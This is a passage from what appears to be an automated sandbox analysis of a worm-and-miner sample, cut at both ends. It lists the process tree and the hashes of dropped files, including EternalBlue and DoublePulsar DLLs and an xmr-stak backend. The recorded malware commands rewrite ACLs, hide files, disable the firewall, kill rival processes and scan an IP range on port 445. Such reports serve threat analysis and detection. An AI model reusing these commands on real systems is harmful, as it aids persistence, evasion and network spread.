                                                                                                              PID:2600
                                                                                                            • C:\Windows\SysWOW64\cacls.exe
                                                                                                              cacls C:\Documents and Settings\All Users\Application Data\clr_optimization_v4.0.30318_64 /c /e /t /g everyone:F
                                                                                                              4⤵
                                                                                                                PID:2656
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                4⤵
                                                                                                                  PID:2612
                                                                                                                • C:\Windows\SysWOW64\cacls.exe
                                                                                                                  cacls C:\ProgramData\Microsoft\clr_optimization_v4.0.30318_64 /c /e /t /g system:F
                                                                                                                  4⤵
                                                                                                                    PID:2904
                                                                                                                    • C:\Windows\SysWOW64\net1.exe
                                                                                                                      C:\Windows\system32\net1 stop "mssecsvc2.0"
                                                                                                                      5⤵
                                                                                                                        PID:1532
                                                                                                                    • C:\Windows\SysWOW64\cacls.exe
                                                                                                                      cacls C:\ProgramData\clr_optimization_v4.0.30318_64 /c /e /t /g everyone:F
                                                                                                                      4⤵
                                                                                                                        PID:1268
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                        4⤵
                                                                                                                          PID:1624
                                                                                                                        • C:\Windows\SysWOW64\cacls.exe
                                                                                                                          cacls C:\ProgramData\clr_optimization_v4.0.30318_64 /c /e /t /g system:F
                                                                                                                          4⤵
                                                                                                                            PID:2892
                                                                                                                            • C:\Windows\SysWOW64\net1.exe
                                                                                                                              C:\Windows\system32\net1 stop "mssecsvc2.1"
                                                                                                                              5⤵
                                                                                                                                PID:2616
                                                                                                                            • C:\Windows\SysWOW64\cacls.exe
                                                                                                                              cacls C:\ProgramData\Microsoft\clr_optimization_v4.0.30318_64\csrss.exe /c /e /t /g everyone:F
                                                                                                                              4⤵
                                                                                                                                PID:2900
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                4⤵
                                                                                                                                  PID:2736
                                                                                                                                • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                  cacls C:\Documents and Settings\All Users\Application Data\clr_optimization_v4.0.30318_64\svchost.exe /c /e /t /g system:F
                                                                                                                                  4⤵
                                                                                                                                    PID:2704
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                    4⤵
                                                                                                                                      PID:2660
                                                                                                                                    • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                      cacls C:\Documents and Settings\All Users\Application Data\clr_optimization_v4.0.30318_64\svchost.exe /c /e /t /g everyone:F
                                                                                                                                      4⤵
                                                                                                                                        PID:2588
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                        4⤵
                                                                                                                                          PID:2276
                                                                                                                                        • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                          cacls C:\Windows\Fonts\Mysql\same.bat /p system:n
                                                                                                                                          4⤵
                                                                                                                                            PID:2608
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                            4⤵
                                                                                                                                              PID:3064
                                                                                                                                            • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                              cacls C:\ProgramData\clr_optimization_v4.0.30318_64\svchost.exe /c /e /t /g everyone:F
                                                                                                                                              4⤵
                                                                                                                                                PID:2252
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                4⤵
                                                                                                                                                  PID:2840
                                                                                                                                                • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                  attrib -r -h -s C:\Documents and Settings\All Users\Application Data\clr_optimization_v4.0.30318_64\svchost.exe
                                                                                                                                                  4⤵
                                                                                                                                                  • Views/modifies file attributes
                                                                                                                                                  PID:1612
                                                                                                                                                • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                  attrib -r -h -s C:\ProgramData\clr_optimization_v4.0.30318_64\svchost.exe
                                                                                                                                                  4⤵
                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                  • Views/modifies file attributes
                                                                                                                                                  PID:2368
                                                                                                                                                • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                  attrib -r -h -s C:\ProgramData\clr_optimization_v4.0.30318_64
                                                                                                                                                  4⤵
                                                                                                                                                  • Views/modifies file attributes
                                                                                                                                                  PID:2308
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                  4⤵
                                                                                                                                                    PID:624
                                                                                                                                                  • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                    cacls C:\Windows\debug\xmrstak_cuda_backend.dll /p system:n
                                                                                                                                                    4⤵
                                                                                                                                                      PID:2348
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                      4⤵
                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                      PID:1664
                                                                                                                                                    • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                      cacls C:\WINDOWS\Debug\item.dat /p system:n
                                                                                                                                                      4⤵
                                                                                                                                                        PID:2100
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                        4⤵
                                                                                                                                                          PID:2524
                                                                                                                                                        • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                          cacls C:\WINDOWS\Web\*.vbs /p system:n
                                                                                                                                                          4⤵
                                                                                                                                                            PID:2388
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                            4⤵
                                                                                                                                                              PID:1560
                                                                                                                                                            • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                              cacls c:\windows\web\*.bat /p system:n
                                                                                                                                                              4⤵
                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                              PID:2312
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                              4⤵
                                                                                                                                                                PID:836
                                                                                                                                                              • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                cacls C:\Windows\Temp\conhost.exe /p system:n
                                                                                                                                                                4⤵
                                                                                                                                                                  PID:880
                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                                  4⤵
                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                  PID:556
                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                                  4⤵
                                                                                                                                                                    PID:2456
                                                                                                                                                                  • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                    cacls C:\Progra~1\Common~1\conime.exe /p system:n
                                                                                                                                                                    4⤵
                                                                                                                                                                      PID:816
                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                                      4⤵
                                                                                                                                                                        PID:2448
                                                                                                                                                                      • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                        cacls C:\Windows\debug\lsmosee.exe /p system:n
                                                                                                                                                                        4⤵
                                                                                                                                                                          PID:2668
                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                                          4⤵
                                                                                                                                                                            PID:2052
                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                                            4⤵
                                                                                                                                                                              PID:884
                                                                                                                                                                            • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                              attrib +s +h +r C:\Windows\help\lsmose.exe
                                                                                                                                                                              4⤵
                                                                                                                                                                              • Sets file to hidden
                                                                                                                                                                              • Views/modifies file attributes
                                                                                                                                                                              PID:908
                                                                                                                                                                            • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                              attrib +s +h +r C:\WINDOWS\Debug\item.dat
                                                                                                                                                                              4⤵
                                                                                                                                                                              • Sets file to hidden
                                                                                                                                                                              • Views/modifies file attributes
                                                                                                                                                                              PID:1404
                                                                                                                                                                            • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                              attrib +s +h +r c:\windows\web\*.bat
                                                                                                                                                                              4⤵
                                                                                                                                                                              • Sets file to hidden
                                                                                                                                                                              • Views/modifies file attributes
                                                                                                                                                                              PID:2004
                                                                                                                                                                            • C:\Windows\SysWOW64\net.exe
                                                                                                                                                                              net stop "mssecsvc2.1"
                                                                                                                                                                              4⤵
                                                                                                                                                                                PID:2892
                                                                                                                                                                              • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                cacls C:\Windows\System32\Tasks\WwANsvc /p system:n
                                                                                                                                                                                4⤵
                                                                                                                                                                                  PID:2800
                                                                                                                                                                                • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                  cacls C:\Windows\System32\Tasks\HomeGroupProvider /p system:n
                                                                                                                                                                                  4⤵
                                                                                                                                                                                    PID:2744
                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                    C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                                                    4⤵
                                                                                                                                                                                      PID:1532
                                                                                                                                                                                    • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                      cacls C:\Windows\System32\Tasks\MiscfostNsi /p system:n
                                                                                                                                                                                      4⤵
                                                                                                                                                                                        PID:2132
                                                                                                                                                                                      • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                        cacls C:\Windows\Tasks\*my* /p system:n
                                                                                                                                                                                        4⤵
                                                                                                                                                                                          PID:2708
                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                                                          4⤵
                                                                                                                                                                                            PID:2736
                                                                                                                                                                                          • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                            cacls C:\Windows\Tasks\*ok* /p system:n
                                                                                                                                                                                            4⤵
                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                            PID:2900
                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                                                            4⤵
                                                                                                                                                                                              PID:2404
                                                                                                                                                                                            • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                              cacls C:\Windows\Tasks\*sa* /p system:n
                                                                                                                                                                                              4⤵
                                                                                                                                                                                                PID:2252
                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                PID:1696
                                                                                                                                                                                              • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                cacls C:\Windows\Tasks\*Group* /p system:n
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                  PID:1580
                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                    PID:2436
                                                                                                                                                                                                  • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                    cacls C:\Windows\Tasks\WwANsvc /p system:n
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                      PID:2160
                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                        PID:1920
                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                          PID:2508
                                                                                                                                                                                                        • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                          cacls C:\Windows\Tasks\MiscfostNsi /p system:n
                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                            PID:844
                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                              PID:1112
                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                PID:1752
                                                                                                                                                                                                              • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                                cacls C:\Windows\System32\Tasks\At1 /c /e /t /g everyone:F
                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                PID:1156
                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                  PID:1560
                                                                                                                                                                                                                • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                                  cacls C:\Windows\System32\Tasks\At2 /c /e /t /g system:F
                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                    PID:1200
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                      PID:836
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                                      cacls C:\Windows\System32\Tasks\At1 /c /e /t /g system:F
                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                        PID:2220
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                          PID:1744
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                                          cacls C:\windows\tasks\At1.job /c /e /t /g everyone:F
                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                            PID:2512
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                            PID:3056
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                                            cacls C:\windows\tasks\At2.job /c /e /t /g system:F
                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                              PID:1700
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                                              cacls C:\windows\tasks\At1.job /c /e /t /g system:F
                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                              PID:1952
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                PID:896
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                attrib +h +s -r C:\windows\tasks\At*.job
                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                • Views/modifies file attributes
                                                                                                                                                                                                                                PID:1224
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\xsfxdel~.exe
                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\xsfxdel~.exe" "C:\Users\Admin\AppData\Local\Temp\44c11f2419a7650053168843f0c092a45187920bec71ede3d26473472575ee6a.exe"
                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                            • Deletes itself
                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                            PID:2564
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                                                          C:\Windows\system32\net1 stop "MicrosoftMssql"
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                            PID:3008
                                                                                                                                                                                                                          • C:\Windows\Fonts\Mysql\svchost.exe
                                                                                                                                                                                                                            C:\Windows\Fonts\Mysql\svchost.exe
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                            PID:2980
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              cmd /c ""C:\Windows\Fonts\Mysql\cmd.bat" "
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                              PID:1380
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                sc config Browser start= auto
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                • Launches sc.exe
                                                                                                                                                                                                                                PID:456
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                sc config lanmanworkstation start= auto
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                • Launches sc.exe
                                                                                                                                                                                                                                PID:852
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                sc config SharedAccess start= disabled
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                • Launches sc.exe
                                                                                                                                                                                                                                PID:1480
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\net.exe
                                                                                                                                                                                                                                net start lanmanworkstation
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                  PID:1692
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                                                                    C:\Windows\system32\net1 start lanmanworkstation
                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                      PID:1516
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                    taskkill /f /im mance.exe
                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                                                                                    PID:2324
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\net.exe
                                                                                                                                                                                                                                    net stop SharedAccess
                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                      PID:1444
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\net.exe
                                                                                                                                                                                                                                      net start lanmanserver
                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                        PID:1276
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                        taskkill /f /im Eter.exe
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                        PID:656
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                        taskkill /f /im puls.exe
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                        PID:1820
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                        taskkill /f /im mance.exe
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                        PID:1660
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                        taskkill /f /im Eter.exe
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                        PID:2412
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                        taskkill /f /im mance.exe
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                        PID:2476
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                        taskkill /f /im puls.exe
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                        PID:1880
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                        taskkill /f /im puls.exe
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                        PID:1556
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                        ping 127.1 -n 5
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                        • Runs ping.exe
                                                                                                                                                                                                                                        PID:1260
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                        ping 127.1 -n 3
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                        • Runs ping.exe
                                                                                                                                                                                                                                        PID:2292
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                        ping 127.1 -n 3
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                        • Runs ping.exe
                                                                                                                                                                                                                                        PID:1496
                                                                                                                                                                                                                                      • C:\Windows\Fonts\Mysql\taskhost.exe
                                                                                                                                                                                                                                        taskhost.exe tcp 89.149.0.254 89.149.255.254 445 450 /save
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                                                                                        PID:2712
                                                                                                                                                                                                                                      • C:\Windows\Fonts\Mysql\wget.exe
                                                                                                                                                                                                                                        wget -O temp.txt "http://v4.ipv6-test.com/api/myip.php"
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                                                                                        PID:2768
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\net.exe
                                                                                                                                                                                                                                        net start Browser
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                          PID:1776
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                          sc config lanmanserver start= auto
                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                          • Launches sc.exe
                                                                                                                                                                                                                                          PID:240
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\mode.com
                                                                                                                                                                                                                                      mode con cols=50 lines=40
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                        PID:796
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                                                                        C:\Windows\system32\net1 start lanmanserver
                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                          PID:1748
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                                                                          C:\Windows\system32\net1 stop SharedAccess
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                            PID:1528
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                                                                            C:\Windows\system32\net1 start Browser
                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                              PID:1428
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                                                                              C:\Windows\system32\net1 start "MicrosoftMysql"
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                PID:2008
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                                                                                C:\Windows\system32\net1 start Schedule
                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                  PID:2712
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                                                                                  C:\Windows\system32\net1 stop "lbpuamoqhpoqju171"
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                    PID:2696
                                                                                                                                                                                                                                                  • C:\Windows\system32\wbem\WMIADAP.EXE
                                                                                                                                                                                                                                                    wmiadap.exe /F /T /R
                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                      PID:1112

                                                                                                                                                                                                                                                    Network

                                                                                                                                                                                                                                                    MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                                                    Replay Monitor

                                                                                                                                                                                                                                                    Loading Replay Monitor...

                                                                                                                                                                                                                                                    Downloads

                                                                                                                                                                                                                                                    • C:\Windows\Fonts\Mysql\Doublepulsar2.dll

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      84KB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      a1dcc5c46acec31002c3273d84e9c990

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      1d998a6dc7a27f13359008d51b4e5d5f155b281c

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      c8fee8d909b05f808257171dd83d310deebb97bf8a495ef8d3791e6ac61bba4c

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      c636311dd4c47fa35856eaa32ffe1f942c8162880e21e297220a4704ddd40445a367b780e5cbea04569100bd719149207f343a86936fe5a6061b940e9dd0dd85

                                                                                                                                                                                                                                                    • C:\Windows\Fonts\Mysql\Eternalblue2.dll

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      69KB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      e50a77d7def8dd3008541c5cb5378ff8

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      c548ae83bf7258371d20576483dfc40d5c5b5ba2

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      958e1435f2c1665ca53231454cf8fbc9a4d75426bae3e12c51bdf33d495e3e0c

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      6890ed62eaf1282feee837b6194ae937dbc2df8bbb5fa3775f1d337ca6cf6de41b5e390af488125cc334acfd3d4c85f61265294ad7ecffd9bbdb4614ff5a98ed

                                                                                                                                                                                                                                                    • C:\Windows\Fonts\Mysql\cmd.bat

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      25KB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      66b66dc0eb2437b233a8256b9a02902f

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      0f8664e738f52053e5b4f07812b76647bde52c9a

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      241328fd46d6ddea11cb6ed2514a950a083e623fbdd9a02602a5696e8b6b6a0e

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      adffc967593f7632462ee458878354f8348951677295678222f9a7a86ac3ffd333d364cea1f87c2fa26860b6208d49b66a96ec23f662474d3e43fc5a5977e4be

                                                                                                                                                                                                                                                    • C:\Windows\Fonts\Mysql\ctfmon.exe

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      200KB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      dde7a62c6e9f858f3dbe472ca9f9b693

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      31959bce7a18628d7d9d1a06514b192196a87884

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      4424f327aec6719f7f55dea92f9501644ad72babd4dee0f2fa817f18ab3bfc5b

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      3adf8525ffb8bd443cead79b238121d678732aec2a4642671289bac6a71037c93302fc6c877ab5e8a5f041e8d0c367fa696de78642d1a55435d790a45fe0bfd8

                                                                                                                                                                                                                                                    • C:\Windows\Fonts\Mysql\ctfmon.exe

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      403KB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      fac0181db3df4f89c0ce42e3b0db83bb

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      ce15828e24d07bed6f3ec40f47eb080408ce898e

                                                                                                                                                                                                                                                      SHA256

